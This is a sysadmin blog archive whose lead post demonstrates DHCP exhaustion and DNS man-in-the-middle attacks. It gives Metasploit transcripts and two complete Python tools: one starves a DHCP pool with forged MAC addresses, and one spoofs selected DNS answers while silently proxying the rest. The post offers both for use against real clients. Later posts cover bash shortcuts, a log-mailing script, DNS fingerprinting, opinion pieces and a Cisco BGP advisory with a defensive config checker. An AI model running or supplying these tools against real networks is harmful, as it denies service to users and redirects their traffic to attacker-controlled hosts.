DHCP Exhaustion and DNS MiTM
by Rootadmin on Mar.14, 2010, under Uncategorized
DigiNinja has created a Metasploit module for a DHCP exhaustion attack. It keeps requesting DHCP addresses until the server stops responding, which, as far as I can tell, means the IP pool is exhausted: there are no addresses left to hand out, so any computer set to get its address from DHCP cannot get on the network. A very nice idea for a denial of service attack in my opinion. Two things worth knowing before you try it: the server keys leases on the client hardware address in the request, so every request has to carry a fresh fake MAC, and the leases it hands out expire, so the attack has to keep running to hold the pool. On the switch side, DHCP snooping with a per-port MAC limit is what stops it.
He has also released a DNS man-in-the-middle module which has been worked on by various people, the last being Wesley McGrew, who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and proxies everything else to a real DNS server (the REALDNS option), so the victim sees genuine results for anything not on the list. DigiNinja's work on it added the ability to reload the config file without a restart by looking up a pre-set domain (the RELOAD option), and fixed a couple of minor bugs.
See http://www.digininja.org/metasploit/dns_dhcp_beta.php
Usage
You'll need to be root to run both modules (raw packet capture for one, port 53 for the other), and for the DHCP module you'll need to put the interface into promiscuous mode before starting the attack. The fake requests carry made-up client MACs, so a server that unicasts its replies sends them to those MACs rather than yours, and without promiscuous mode the card drops them before the module ever sees them. The easiest way to explain how to use them is to just show the modules in use, so here they are...
DHCP Exhaustion
msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set
Global
======
No entries in data store.
Module: dhcp_exhaustion/exhaust
===============================
Name Value
---- -----
DHCPSERVER 255.255.255.255
SNAPLEN 65535
TIMEOUT 2
msf auxiliary(exhaust) > run
[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed
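As an added example (my own code, not DigiNinja's module), here is the same exhaustion loop in plain Python so you can see what the module is doing on the wire. The packet layout is RFC 2131; the only assumptions are a lab DHCP server on the local segment and root to bind UDP port 68 (which your own dhclient may already hold). It sets the BOOTP broadcast flag so a server that honours it broadcasts the OFFER and ACK, which a normal socket receives even though chaddr is not your MAC; a server that unicasts to the fake MAC instead is only visible in promiscuous mode, which is exactly why the module captures with pcap. Only the encode/decode functions run when the file is imported; exhaust() is what you point at the lab.

```python
"""DHCP pool exhaustion in plain sockets. Added example for this post, not
DigiNinja's module. Assumes a lab DHCP server on the local segment and root
to bind UDP/68; nothing touches the network until exhaust() is called."""
import os
import socket
import struct
import ipaddress

BOOTREQUEST, BOOTREPLY = 1, 2
DISCOVER, OFFER, REQUEST, ACK, NAK = 1, 2, 3, 5, 6
MAGIC = b"\x63\x82\x53\x63"          # RFC 2131 options cookie
BROADCAST = 0x8000                   # flags bit: "broadcast the reply to me"
HDR = "!BBBBIHH4s4s4s4s16s64s128s"   # fixed BOOTP header, 236 bytes


def random_mac():
    # Locally administered unicast address. The server keys leases on chaddr,
    # so every round has to look like a brand-new client.
    return b"\x02" + os.urandom(5)


def build(msg_type, mac, xid, requested_ip=None, server_id=None,
          op=BOOTREQUEST, yiaddr="0.0.0.0"):
    """Encode a DHCP message. Clients send op=BOOTREQUEST; op=BOOTREPLY and
    yiaddr exist only so the tests can construct a sample server reply."""
    hdr = struct.pack(HDR, op, 1, 6, 0, xid, 0, BROADCAST,
                      b"\0" * 4, ipaddress.ip_address(yiaddr).packed,
                      b"\0" * 4, b"\0" * 4, mac.ljust(16, b"\0"),
                      b"\0" * 64, b"\0" * 128)
    opts = bytes([53, 1, msg_type])                       # DHCP message type
    if requested_ip:
        opts += bytes([50, 4]) + ipaddress.ip_address(requested_ip).packed
    if server_id:
        opts += bytes([54, 4]) + ipaddress.ip_address(server_id).packed
    return hdr + MAGIC + opts + b"\xff"                   # 0xff = end option


def parse(pkt):
    """Decode a DHCP message into a dict, or None if it is not DHCP at all."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC:
        return None
    f = struct.unpack(HDR, pkt[:236])
    out = {"op": f[0], "xid": f[4], "yiaddr": str(ipaddress.ip_address(f[8])),
           "chaddr": f[11][:6], "type": None, "server_id": None, "requested": None}
    opts, i = pkt[240:], 0
    while i < len(opts) and opts[i] != 0xFF:
        if opts[i] == 0:                  # pad option carries no length byte
            i += 1
            continue
        code, ln = opts[i], opts[i + 1]
        val = opts[i + 2:i + 2 + ln]
        i += 2 + ln
        if code == 53:
            out["type"] = val[0]
        elif code == 54:
            out["server_id"] = str(ipaddress.ip_address(val))
        elif code == 50:
            out["requested"] = str(ipaddress.ip_address(val))
    return out


def wait_for(sock, xid):
    """Block until a server reply with our transaction id arrives (socket.timeout otherwise)."""
    while True:
        data, _ = sock.recvfrom(1500)
        msg = parse(data)
        if msg and msg["op"] == BOOTREPLY and msg["xid"] == xid:
            return msg


def exhaust(bind_ip="0.0.0.0", timeout=2.0, max_leases=4096):
    """DISCOVER -> OFFER -> REQUEST -> ACK with a new MAC each round until the
    server stops answering. Like the module, a timeout means 'pool exhausted'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.bind((bind_ip, 68))
    s.settimeout(timeout)
    leased = []
    for _ in range(max_leases):
        mac, xid = random_mac(), struct.unpack("!I", os.urandom(4))[0]
        s.sendto(build(DISCOVER, mac, xid), ("255.255.255.255", 67))
        try:
            offer = wait_for(s, xid)
            if offer["type"] != OFFER:
                break
            s.sendto(build(REQUEST, mac, xid, offer["yiaddr"], offer["server_id"]),
                     ("255.255.255.255", 67))
            ack = wait_for(s, xid)
        except socket.timeout:
            print("Timeout waiting for reply, assuming pool exhausted")
            break
        if ack["type"] != ACK:
            print("Got NAK for", offer["yiaddr"])
            continue
        leased.append(ack["yiaddr"])
        print("Leased", ack["yiaddr"])
    return leased


if __name__ == "__main__":
    exhaust()
```

Like the module, it treats a timeout waiting for a reply as the pool being empty. Leases expire, so loop it if you need the pool held for longer than the server's lease time.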
DNS MiTM
msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set
Global
======
No entries in data store.
Module: dns_mitm/dns_mitm
=========================
Name Value
---- -----
RELOAD digininja.reload
SRVHOST 0.0.0.0
SRVPORT 53
msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set
Global
======
No entries in data store.
Module: dns_mitm/dns_mitm
=========================
Name Value
---- -----
FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
REALDNS 192.168.0.8
RELOAD digininja.reload
SRVHOST 0.0.0.0
SRVPORT 53
msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file
The hosts file contains a single entry
192.168.0.2 google.com
Now do some look ups, google.com and bbc.co.uk
nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
Name: google.com
Address: 192.168.0.2
Name: google.com
Address: 192.168.0.2
Name: google.com
Address: 192.168.0.2
> bbc.co.uk
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
Name: bbc.co.uk
Address: 212.58.224.138
Google is intercepted but the BBC gets through; now add the BBC to the hosts file
echo "192.168.0.2 bbc.co.uk" >> dns.txt
Refresh the server by looking up the special domain (it deliberately answers with no records, hence the "No answer" from nslookup) and then check the BBC again
> digininja.reload
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server: localhost
Address: 127.0.0.1#53
Non-authoritative answer:
Name: bbc.co.uk
Address: 192.168.0.2
The BBC is now ours!
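As an added example (again my own code, not the Metasploit module), here is the core of the DNS part in plain Python: a hosts-style list, a wire-format query parser, a spoofed A-record reply builder, and the reload-on-magic-name trick. It assumes A queries only, a real resolver reachable on UDP 53 (REALDNS in the module) and root for port 53; the hosts text used in the tests is constructed. Names not on the list return None from handle(), which serve() turns into a forward to the real server, so the victim keeps working and sees nothing odd.

```python
"""Added example, not DigiNinja's module: selective DNS MiTM in plain Python.
Listed names get a spoofed A record, everything else is proxied to the real
resolver, and looking up a magic name reloads the list without a restart."""
import socket
import struct
import ipaddress

RELOAD_NAME = "digininja.reload"   # the module's default RELOAD domain

def load_hosts(text):
    """Parse 'ip name' lines (the dns.txt format above) into {name: ip}."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and not parts[0].startswith("#"):
            table[parts[1].lower().rstrip(".")] = parts[0]
    return table

def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\0"

def decode_name(pkt, off):
    """Read a (possibly compressed) name at off; returns (name, offset after it)."""
    labels, end = [], None
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:                        # compression pointer
            end = off + 2 if end is None else end
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(pkt[off:off + ln].decode())
        off += ln
    return ".".join(labels).lower(), (off if end is None else end)

def build_query(name, qid=0x1234, qtype=1):
    """Recursive query for name (qtype 1 = A, 28 = AAAA)."""
    hdr = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return hdr + encode_name(name) + struct.pack("!HH", qtype, 1)

def parse_query(pkt):
    name, off = decode_name(pkt, 12)
    return {"id": struct.unpack("!H", pkt[:2])[0], "name": name,
            "qtype": struct.unpack("!H", pkt[off:off + 2])[0],
            "question": pkt[12:off + 4]}

def build_answer(q, ip=None, ttl=60):
    """Response to q; ip=None is NOERROR with no answer (what the reload name gets)."""
    hdr = struct.pack("!HHHHHH", q["id"], 0x8180, 1, 1 if ip else 0, 0, 0)  # QR RD RA
    rr = b""
    if ip:  # owner name = pointer to the question at offset 12, type A, class IN
        rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + ipaddress.ip_address(ip).packed
    return hdr + q["question"] + rr

def answer_ips(pkt):
    """A-record addresses in a response (enough to check our own replies)."""
    qd, an = struct.unpack("!HH", pkt[4:8])
    off, ips = 12, []
    for _ in range(qd):
        off = decode_name(pkt, off)[1] + 4
    for _ in range(an):
        off = decode_name(pkt, off)[1]
        rtype, _c, _t, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1:
            ips.append(str(ipaddress.ip_address(pkt[off:off + 4])))
        off += rdlen
    return ips

class Middler:
    """source() returns the hosts file text: a file read in real use, a string in tests."""
    def __init__(self, source, real_dns, reload_name=RELOAD_NAME):
        self.source, self.real_dns, self.reload_name = source, real_dns, reload_name
        self.reload()

    def reload(self):
        self.table = load_hosts(self.source())

    def handle(self, pkt):
        """Spoofed response bytes, or None meaning 'forward this to the real server'."""
        q = parse_query(pkt)
        if q["name"] == self.reload_name:
            self.reload()
            return build_answer(q)
        if q["qtype"] == 1 and q["name"] in self.table:
            return build_answer(q, self.table[q["name"]])
        return None

    def forward(self, pkt):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(3)
            s.sendto(pkt, (self.real_dns, 53))
            return s.recv(4096)

    def serve(self, host="0.0.0.0", port=53):
        """Blocking UDP loop; port 53 needs root. Not called on import."""
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.bind((host, port))
            while True:
                pkt, peer = s.recvfrom(4096)
                s.sendto(self.handle(pkt) or self.forward(pkt), peer)
```

To run it for real: Middler(lambda: open("dns.txt").read(), "192.168.0.8").serve(). A detail the nslookup output above shows: the reload name answers NOERROR with zero records, so the client reports "No answer" rather than an error. When you use this against a real client, remember that resolvers and browsers cache, so the TTL on the spoofed record matters more than you would think.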
Bash shell keyboard shortcuts
by Rootadmin on Dec.10, 2009, under Uncategorized
Here is a list of some bash keyboard shortcuts you may or may not find useful
Alt + B Move cursor backward one word on the current line
Alt + F Move cursor forward one word on the current line
Ctrl + A Go to the beginning of the line you are currently typing on
Ctrl + C Kill whatever you are running
Ctrl + D Exit the current shell
Ctrl + E Go to the end of the line you are currently typing on
Ctrl + H Same as backspace
Ctrl + K Clear the line after the cursor
Ctrl + L Clears the Screen, similar to the clear command
Ctrl + U Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + R Lets you search through previously used commands
Ctrl + T Swap the last two characters before the cursor
Ctrl + W Delete the word before the cursor
Ctrl + Z Puts whatever you are running into a suspended background process. fg restores it.
Esc + T Swap the last two words before the cursor
Tab Auto-complete files and folder names
Linux : Automatically send logs daily
by Rootadmin on Dec.09, 2009, under Linux, Other
Well, below is my first attempt at a shell script; firstly, understand I am no programmer!
Before we look at it: my server is running OpenVPN and Uncomplicated Firewall (I'm running Ubuntu Server).
So how does it work?
Firstly we declare that we are using the bash shell using
#!/bin/bash
Next we set up some variables: the first simply formats the date and calls it TODAYSDATE,
then we set today's archive to be archive.TODAYSDATE and call it TODAYS_ARCHIVE.
Next we create a directory called archive.TODAYSDATE
Now to the best bit, we start processing the logs
- We extract today's logs out of syslog
- From the extracted logs we extract the firewall (Uncomplicated Firewall / UFW) logs to a separate file
- Now extract today's messages log
- From today's extracted logs extract all OpenVPN related logs to a separate log file
- Extract today's apache access.log and error.log
- Provide us with the currently running processes
- Zip it all up to the /archive/ folder
- Go back up a directory level and delete the folder called archive.TODAYSDATE
- Now use mutt to attach the zip file to an email and send it. Bear in mind the zip is not encrypted and is full of IP addresses, usernames and firewall hits, so if it leaves your own network encrypt it first (gpg works on the zip before mutt attaches it) or only send it through a relay you trust
Now for the script – PLEASE FEEL FREE TO USE
#!/bin/bash
# Script By Liam Somerville, www.rootadmin.co.uk
# Use freely
# Stop on the first failed command or unset variable rather than mailing a half-built archive
set -euo pipefail
#####################################################################
# Set up the variables
#####################################################################
#Set todays date
TODAYSDATE=$(date +"%d-%b-%Y")
#Format Archive
TODAYS_ARCHIVE=archive.$TODAYSDATE
#Where the zips live and who gets them
ARCHIVE_ROOT=/archive
MAILTO=you@your.email.address.com
#Date as each log writes it: syslog, messages and vsftpd pad the day with a
#space (%e), apache error.log zero-pads it (%d), access.log uses day/month
SYSLOG_DATE=$(date +"%b %e")
APACHE_ERROR_DATE=$(date +"%b %d")
APACHE_ACCESS_DATE=$(date +"%d/%b")
#####################################################################
# Finished setting up Variables
#
# Now start processing the log files
#####################################################################
# Make a directory called archive with todays date and change to that directory
# (work under a fixed path so it behaves the same when run from cron)
mkdir -p "$ARCHIVE_ROOT"
cd "$ARCHIVE_ROOT"
mkdir "$TODAYS_ARCHIVE"
cd "$TODAYS_ARCHIVE"
#Write the log files. "|| true" stops set -e aborting when grep finds no lines
#Archive todays Syslog, extract all firewall related logs to firewall, then
# extract messages
grep "$SYSLOG_DATE" /var/log/syslog > "syslog.$TODAYSDATE" || true
grep UFW "syslog.$TODAYSDATE" > "firewall_log.$TODAYSDATE" || true
grep "$SYSLOG_DATE" /var/log/messages > "messages.$TODAYSDATE" || true
#Process the OpenVPN Server logs
grep "ovpn-server" "syslog.$TODAYSDATE" > "vpn_server_log.$TODAYSDATE" || true
#
#Process Apache Logs
grep "$APACHE_ERROR_DATE" /var/log/apache2/error.log > "apache_error_log.$TODAYSDATE" || true
grep "$APACHE_ACCESS_DATE" /var/log/apache2/access.log > "apache_access_log.$TODAYSDATE" || true
#
#Process FTP Logs
grep "$SYSLOG_DATE" /var/log/vsftpd.log > "ftp_log.$TODAYSDATE" || true
#
# Get a list of currently running processes
ps aux > "Processes.$TODAYSDATE"
# Zip up all the logs and delete todays log folder
zip "$ARCHIVE_ROOT/$TODAYS_ARCHIVE.zip" ./*
cd ..
rm -r "$TODAYS_ARCHIVE"
####################################################################
# Now email the zip file ("--" tells mutt the attachment list has ended and
# the address follows; newer versions refuse the command without it)
###################################################################
echo | mutt -a "$ARCHIVE_ROOT/$TODAYS_ARCHIVE.zip" -s "Event logs for $TODAYSDATE" -- "$MAILTO"
UK 3 Strikes law petition
by Rootadmin on Nov.24, 2009, under Uncategorized
Following the decision of the European Parliament that enables European member states to approve laws that force ISPs to disconnect individuals from the Internet, the UK is planning on enforcing its own version of the “three-strikes” law meant to discourage illegal file sharing.
According to The Guardian, Lord Peter Mandelson, the Business Secretary, announced that this law is supposed to become reality in 2011. It will go through a 12-month testing phase that will see warning letters sent to persistent offenders. If the scope of the illegal activity doesn't drop by at least 70 percent by April 2011, three months later the practice of cutting off Internet access will be set in motion.
There were a lot of voices raised against this plan. ISPs don’t want the responsibility – it’s bad for their public image, and also raises operational costs. The Open Rights Group sees it as an infringement of basic rights. Times Online reports that even UK’s law enforcement and intelligence services are against it. They fear that pirates will begin to use encryption and thus make their job even harder (not to mention the increase of workload and costs).
On the opposite side sit the music and movie industries. They are, of course, anxious to see the law in practice since they “lose” hundreds of millions of pounds every year.
SIGN THE PETITION http://petitions.number10.gov.uk/dontdisconnectus/ – UK Citizens only
Fingerprinting DNS servers in Ubuntu
by Rootadmin on Nov.21, 2009, under Uncategorized
Install fpdns in Ubuntu
sudo aptitude install fpdns
This will complete the installation
Using fpdns
fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server
Where: server is an ip address or a resolvable name
or ‘-’ to read list of servers from stdin
-c (where appropriate check CH TXT version) [off]
-d (debug) [off]
-f (force check CH TXT version) [off]
-F (maximum forked processes) [10]
-p port (nameserver is on this port) [53]
-Q srcaddr (source IP address) [0.0.0.0]
-r retry (set number of attempts) [1]
-s (short form) [off]
-t time (set query timeout) [5]
-v (show version)
fpdns Examples. The -D form used below looks up the name servers for the domain and fingerprints each of them, which is why several lines come back per domain. The result is a version range inferred from how the server answers oddly formed queries, not a banner, so treat it as a lead to confirm rather than a fact; -c adds a CH TXT version query on top, which many admins fake or disable.
BIND Version 8 Example
fpdns -D google.com
fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 — 8.4.4
BIND Version 9 Example
fpdns -D debianhelp.co.uk
fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]
TinyDNS Example
fpdns ns1.eu.dedicatedserver.com.
fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05
Microsoft windows 2003 Example
fpdns -D microsoft.com
fingerprint (microsoft.com, 207.68.160.190): Microsoft Windows DNS 2003
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003
PS3 update 3.0
by Rootadmin on Aug.20, 2009, under Other
Well, the update for the PS3, version 3.0, looks very disappointing.
It's due to be released on September 1st.
Hi everyone, PlayStation 3 (PS3) firmware update (v3.00) adds a number of great new features that we’re excited to share with you. The latest update incorporates changes that improve navigation on your PS3. First, you’ll notice some cosmetic changes to the design of the XMB (Xross Media Bar). We’ve enhanced the look and feel of the XMB so that it’s easier and even more intuitive to use. We’ve also added network improvements and personalization options to help enhance your PS3 experience.
Additional highlights from update 3.00 include:
- “What’s New” – The “Information Board” will be replaced with a “What’s New” section, which allows you to enjoy interactive PlayStation news every time you start the PS3 system. Located under the PlayStation Network icon, “What’s New” displays the latest and greatest game, video, PlayStation Network and PlayStation news and releases, as well as your recently played games, in a sleek, new animated format.
- Status Indicator – In the top right corner we’ve added an indicator bar, which displays your user icon, friend icon, the number of friends you have online and a small message icon to let you know if you have any new messages. The indicator also includes a scrolling ticker that features the latest news from PlayStation Network. In addition, when you press the PS button, the battery life indicator will no longer cover up the clock.
- Friends List – Now your PlayStation Network friends will appear in a slightly redesigned format on your Friends List. Also, messages will now be viewable from each of your friends’ respective profiles.
- PlayStation Store Shortcuts – We’ve added a handy shortcut icon to the PlayStation Store under both the Game and Video categories so you can access the latest content quickly and easily.
- Personalization – Personalize your PS3 with new dynamic custom themes and avatars. Dynamic themes as well as free and premium avatars will be available through PlayStation Store. A dynamic theme takes your screen to a whole new level as it incorporates animated objects into the background.
- Trophies – Showcasing your hard earned trophies just got better. Update 3.00 gives game developers the ability to modify how they display trophies for add-on content. Base and add-on game trophies will continue to be combined into a single list so you can see where you stand in a game as a whole. Within that list, trophies will be broken out into subcategories—base trophies and add-on trophies—that way, you can easily view the percentage of your base game trophy collection, and separately track your trophy progress in add-on packs. Look for this enhancement to be included in upcoming games.
GIVE IT UP!: IE6
by Rootadmin on Aug.15, 2009, under Microsoft
GIVE IT UP: Microsoft have said they will support IE 6 until 2014. IE 6 was initially released on August 27, 2001, so come the proposed end of life date, 2014, IE 6 will be 13 years old! In computing terms, that makes IE 6 a dinosaur.
As of January 10, 2009, Secunia reports 142 vulnerabilities in Internet Explorer 6, 22 of which are unpatched, some of which are rated moderately critical in severity.
“Microsoft has underlined support for its Internet Explorer 6 web browser, despite acknowledging its flaws.
The software giant said it would support IE6 until 2014 – four years beyond the original deadline.
Critics – some of which have started an online campaign – want the eight-year-old browser mothballed because they claim it slows the online experience.
“Friends do not let friends use IE6,” said Amy Barzdukas, Microsoft’s general manager for Internet Explorer.
“If you are in my social set and I have been to your house for dinner, you are not using IE6,” she said. “But it is much more complicated when you move into a business setting.”
“It’s hard to be cavalier in this economy and say ‘oh it’s been around for so long they need to upgrade,’” Ms Barzdukas told journalists in San Francisco..
Web monitoring firms estimate that 15-20% of people still use IE6 to browse the web.
Enough is enough
Among those speaking out against IE6 is a group of more than 70 developers who have banded together to form a project called ie6nomore.” – http://news.bbc.co.uk/1/hi/technology/8196242.stm
Why not take a look at IE6NoMore
Proof that the academic world has lost it!
by Rootadmin on Aug.10, 2009, under Other
For some time now I have believed that there has been too much importance placed on the academic world. Today it would appear I was proven right.
“A student at a British university has been awarded the first ever PhD in text messaging.
Linguist Caroline Tagg – now Dr Caroline Tagg – spent more than three years at Birmingham University researching the subject of text messages and the language used within them.
She trawled through 11,000 text messages sent by 235 people aged between 18 and 65 and together containing 190,000 words, and analysed them for the quality (or not) of their spelling, grammar and abbreviation.
She concluded that the average text contains 17.5 words and, contrary to the popular view that text messaging is eroding existing styles of written communication, that texts are good for the English language.
“Quite the contrary from destroying the English [language], [text messaging] is actually encouraging it,” she told newspaper The Telegraph.” – James Sherwood, http://www.reghardware.co.uk/2009/08/10/texting_phd/
Cisco Security Advisory: Cisco IOS Software Border Gateway Protocol 4-Byte Autonomous System Number Vulnerabilities
by Rootadmin on Jul.30, 2009, under Cisco
Recent versions of Cisco IOS Software support RFC4893 (“BGP Support for Four-octet AS Number Space”) and contain two remote denial of service (DoS) vulnerabilities when handling specific Border Gateway Protocol (BGP) updates.
These vulnerabilities affect only devices running Cisco IOS Software with support for the four-octet AS number space (hereafter referred to as 4-byte AS numbers) and with BGP routing configured.
The first vulnerability could cause an affected device to reload when processing a BGP update that contains autonomous system (AS) path segments made up of more than one thousand autonomous systems.
The second vulnerability could cause an affected device to reload when the affected device processes a malformed BGP update that has been crafted to trigger the issue.
Cisco has released free software updates to address these vulnerabilities.
No workarounds are available for the first vulnerability.
A workaround is available for the second vulnerability.
This advisory is posted at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20090729-bgp.shtml.
Affected Products
These vulnerabilities affect only devices running Cisco IOS and Cisco IOS XE Software (hereafter both referred to simply as Cisco IOS) with support for RFC4893 that have been configured for BGP routing.
The software table in the section “Software Versions and Fixes” of this advisory indicates all affected Cisco IOS Software versions that have support for RFC4893 and are affected by this vulnerability.
A Cisco IOS software version that has support for RFC4893 will allow configuration of AS numbers using 4 Bytes. The following example identifies a Cisco device that has 4 byte AS number support:
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#router bgp ?
  <1-65535>    Autonomous system number
  <1.0-XX.YY>  4 Octets Autonomous system number

Or:

Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#router bgp ?
  <1-4294967295>  Autonomous system number
  <1.0-XX.YY>     Autonomous system number
The following example identifies a Cisco device that has 2 byte AS number support:
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#router bgp ?
  <1-65535>  Autonomous system number
A router that is running the BGP process will contain a line in the configuration that defines the autonomous system number (AS number), which can be seen by issuing the command line interface (CLI) command “show running-config”.
The canonical textual representation of four byte AS Numbers is standardized by the IETF through RFC5396
(Textual Representation of Autonomous System (AS) Numbers). Two major ways for textual representation have been defined as ASDOT and ASPLAIN. Cisco IOS routers support both textual representations of AS numbers. For further information about textual representation of four byte AS numbers in Cisco IOS Software consult the document “Explaining 4-Byte Autonomous System (AS) ASPLAIN and ASDOT Notation for Cisco IOS” at the following link: http://www.cisco.com/en/US/prod/collateral/iosswrel/ps6537/ps6554/ps6599/white_paper_c11_516829.html
Cisco IOS Software with support for RFC4893 is affected by both vulnerabilities if BGP routing is configured using either ASPLAIN or ASDOT notation.
The following example identifies a Cisco device that is configured for BGP using ASPLAIN notation:
router bgp 65536
The following example identifies a Cisco device that is configured for BGP using ASDOT notation:
router bgp 1.0
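As an added example (not from Cisco's advisory; written here for illustration), the following Python does the ASPLAIN/ASDOT arithmetic that RFC 5396 defines, scans a config for router bgp lines whose value or notation can only come from RFC4893-capable software, and counts the ASes in an AS_PATH attribute against the advisory's "more than one thousand" trigger for the first vulnerability. The config text and path bytes in the tests are constructed; the AS_PATH decoder assumes 4-octet ASes as an RFC4893 speaker encodes them (pass as_size=2 for a 2-byte speaker).

```python
"""Added example, not part of the Cisco advisory: RFC 5396 ASPLAIN/ASDOT
conversion, a scan of IOS config for BGP AS numbers that need RFC 4893
support, and an AS_PATH length check against the advisory's trigger."""
import re

ASDOT_RE = re.compile(r"(\d+)\.(\d+)")
AS_PATH_LIMIT = 1000   # first vulnerability: paths with more than this many ASes


def asdot_to_asplain(text):
    """'1.0' -> 65536; plain decimals pass through. RFC 5396: high.low = high*65536 + low."""
    m = ASDOT_RE.fullmatch(text)
    if m:
        high, low = int(m.group(1)), int(m.group(2))
        if high > 65535 or low > 65535:
            raise ValueError("ASDOT halves must be 0..65535: " + text)
        return high * 65536 + low
    if not text.isdigit() or int(text) > 4294967295:
        raise ValueError("not an AS number: " + text)
    return int(text)


def asplain_to_asdot(asn):
    """RFC 5396 'asdot': 2-byte ASNs stay plain (65535), larger ones become high.low."""
    return str(asn) if asn < 65536 else f"{asn >> 16}.{asn & 0xFFFF}"


def scan_config(config_text):
    """Every 'router bgp <asn>' line, normalised to both notations. needs_rfc4893
    is True when the value or the ASDOT notation can only be parsed by
    4-byte-AS capable software, which is the population the advisory covers."""
    findings = []
    for line in config_text.splitlines():
        m = re.match(r"\s*router bgp\s+(\S+)", line)
        if not m:
            continue
        raw = m.group(1)
        asn = asdot_to_asplain(raw)
        findings.append({"raw": raw, "asplain": asn, "asdot": asplain_to_asdot(asn),
                         "needs_rfc4893": asn > 65535 or "." in raw})
    return findings


def count_as_path(attr_value, as_size=4):
    """Count ASes in an AS_PATH attribute value, laid out as repeated segments of
    (type, count, count*as_size bytes). as_size is 4 on an RFC 4893 speaker
    (and in AS4_PATH), 2 on a 2-byte speaker. Returns (total, segments)."""
    total, off, segs = 0, 0, []
    while off < len(attr_value):
        seg_type, n = attr_value[off], attr_value[off + 1]
        off += 2
        asns = [int.from_bytes(attr_value[off + i * as_size:off + (i + 1) * as_size], "big")
                for i in range(n)]
        off += n * as_size
        segs.append((seg_type, asns))
        total += n
    return total, segs


def over_limit(total):
    """True when a path is long enough to hit the advisory's first trigger."""
    return total > AS_PATH_LIMIT
```

Point scan_config at the output of "show running-config" and anything flagged needs_rfc4893 is a device that must be running RFC4893-capable code, so the only question left is whether its release is in the fixed table.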
To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to “Cisco Internetwork Operating System Software” or “Cisco IOS Software.” The image name displays in parentheses, followed by “Version” and the Cisco IOS Software release name. Other Cisco devices do not have the show version command or may provide different output.
The following example identifies a Cisco product that is running Cisco IOS Software Release 12.3(26) with an installed image name of C2500-IS-L:
Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
